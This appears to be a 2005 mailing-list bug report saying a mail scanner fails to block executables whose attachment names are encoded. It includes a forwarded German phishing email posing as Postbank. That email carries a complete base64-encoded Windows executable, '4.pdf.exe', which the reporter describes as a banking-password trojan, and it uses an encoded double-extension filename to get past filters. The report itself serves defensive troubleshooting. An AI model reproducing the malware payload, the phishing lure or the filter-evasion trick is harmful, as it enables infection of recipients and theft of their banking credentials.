Recently I got many mails with executable attachments although qs is
configured to block them. The problem seems to be that the filename of
the attachment ist encoded so qs does not notice that it is "4.pdf.exe".
This is nasty because the executable loads a virus which tries to spy
bancing passwords.
A sample email is attached to this mail.
Werner
Message-ID: <[EMAIL PROTECTED]>
Reply-To: <[EMAIL PROTECTED]>
From: <[EMAIL PROTECTED]>
To: <my email address>
Subject: =?koi8-r?B?UG9zdGJhbms=?=
Date: Sun, 30 Jan 2005 12:07:39 -0800
MIME-Version: 1.0
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
X-GMX-Antispam: -2 (not scanned, spam filter disabled)
X-Resent-By: Forwarder <[EMAIL PROTECTED]>
X-Resent-For: [EMAIL PROTECTED]
X-Resent-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 3.0.2 (2004-11-16) on gneiss.isc4u.de
X-Spam-Level: **
X-Spam-Status: No, score=2.5 required=5.0 tests=FORGED_RCVD_HELO,
MSGID_OUTLOOK_INVALID,NO_REAL_NAME,SPF_HELO_PASS,SPF_PASS
autolearn=no version=3.0.2
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0011_01C45F70.C992BF3E"
------=_NextPart_000_0011_01C45F70.C992BF3E
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain;
charset="koi8-r"
Sehr geehrter Postbankkunde,
In letzter Zeit versenden Betrueger vermehrt eMails, die die Kunden aufford=
ern, Kontonummer, PIN (Persoenliche IdentifikationsNummer) und TAN (Transak=
tionsnummer) preiszugeben. Dabei sind die Absenderadressen der Banken gefae=
lscht.
Der Link in der eMail fuehrt jedoch nicht auf die sichtbare Adresse, sonder=
n auf eine gefaelschte Bankseite. Auf dieser gefaelschten Bankseite bitten =
die Betr=D8ger um Eingabe von Kontonummer, PIN und TAN. Dieser Bankseite fe=
hlen jedoch alle "Echtheitsmerkmale" von Banking-Seiten
Bitte ueberpr=D8fen Sie umgehend mit dem anhangenden Dokument ob Ihr Konto =
gefaehrdet ist!
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D
Deutsche Postbank AG
Friedrich-Ebert-Allee 114 - 126
53113 Bonn
Internet: www.postbank.de
Sitz der Gesellschaft: Bonn
HRB 6793, Amtsgericht Bonn
Umsatzsteuer-Identifikationsnummer: DE 169824467
=A9 2004 Deutsche Postbank AG
------=_NextPart_000_0011_01C45F70.C992BF3E
Content-Type: application/octet-stream;
name="=?koi8-r?B?NC5wZGYuZXhl?="
Content-Disposition: attachment;
filename="=?koi8-r?B?NC5wZGYuZXhl?="
Content-Transfer-Encoding: base64
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
BIkHg8cEg+kEd/EBz+lM////Xon3uRIAAACKB0cs6DwBd/eAPwB18osHil8EZsHoCMHAEIbEKfiA
6+gB8IkHg8cFiNji2Y2+AEAAAIsHCcB0PItfBI2EMKhjAAAB81CDxwj/luRjAACVigdHCMB03In5
V0jyrlX/luhjAAAJwHQHiQODwwTr4f+W7GMAAGHpGK7//wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAIAAwAAACAAAIAOAAAAYAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAOAAAgAAAAAAA
AAAAAAAAAAAAAQAJBAAAUAAAAKhwAADoAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAoAAAgHgA
AIAAAAAAAAAAAAAAAAAAAAEACQQAAJAAAACUcwAAFAAAAAAAAAAAAAAAAQAwALBAAAAoAAAAIAAA
AEAAAAABAAQAAAAAAIACAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAgAAAgAAAAICAAIAAAACAAIAA
gIAAAICAgADAwMAAAAD/AAD/AAAA//8A/wAAAP8A/wD//wAA////AAAAAAAHd3d3d3d3d3d3d3cA
AAAAAAAAAAAAAAAAAAAHAAAAAIiIiIiIiIiIiIiIBwAAAACAiAhwCHB4AHhwCAcAAAAAhwAICAgI
CAgHd4gHAAAAAIcIeAgICAgICAgIBwAAAACIB3hwCHB4AHhweAcAAAAAiACJiAiIiAiIiIgHAAAA
AIhwiZgIiIgIiIiIBwAAAACIiIiZiIiIiIiIiAcAAAAAiIiIiZiIiIiIiIgHAAAAAIiIiIiZiIiI
iImYBwAAAACIiIiIiZmZmZmYmAcAAAAAiIiIiIiYiJmZmYgHAAAAAIiIiIiImYmYiIiIBwAAAACI
iIiIiImZiIiIiAcAAAAAiIiIiIiJmIiIiIgHAAAAAIiIiIiIiZiIiIiIBwAAAACIiIiIiImYiIiI
iAcAAAAAiIiIiIiJmIiIiIgHAAAAAHd3d3d3cRd3iIiIBwAAAAAAAAAAAAAAB4iIiAcJmZmZmZmZ
mZmZmQeIiIgHCZmfmZn/+Z+ZmZkHiIiIBwmZn5mZ+Z+fmZmZB4iIiAcJmZ//mfmfn/+ZmQeId3cH
CZmfmfn5n5+ZmZkHgAAAAAmZn/+Z//mf//mZB4CZmQAJmZmZmZmZmZmZmQiAmZAAAAAAAAAAAAAA
AAAIgJkAAAAAAACIiIiIiIiIiICQAAAAAAAAAAAAAAAAAAAAAAAA/4AAAP4AAAD+AAAA/gAAAP4A
AAD+AAAA/gAAAP4AAAD+AAAA/gAAAP4AAAD+AAAA/gAAAP4AAAD+AAAA/gAAAP4AAAD+AAAA/gAA
AP4AAAD+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAQAAAAMAAAAH/gAAD/4AAB+YQwAA
AAABAAEAICAQAAEABADoAgAAAQAAAAAAAAAAAAAAAAD8cwAA5HMAAAAAAAAAAAAAAAAAAAl0AAD0
cwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAWdAAAJHQAADR0AAAAAAAAQnQAAAAAAABLRVJORUwzMi5E
TEwAQURWQVBJMzIuZGxsAAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwAARXhpdFByb2Nl
c3MAAABSZWdDbG9zZUtleQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
------=_NextPart_000_0011_01C45F70.C992BF3E--
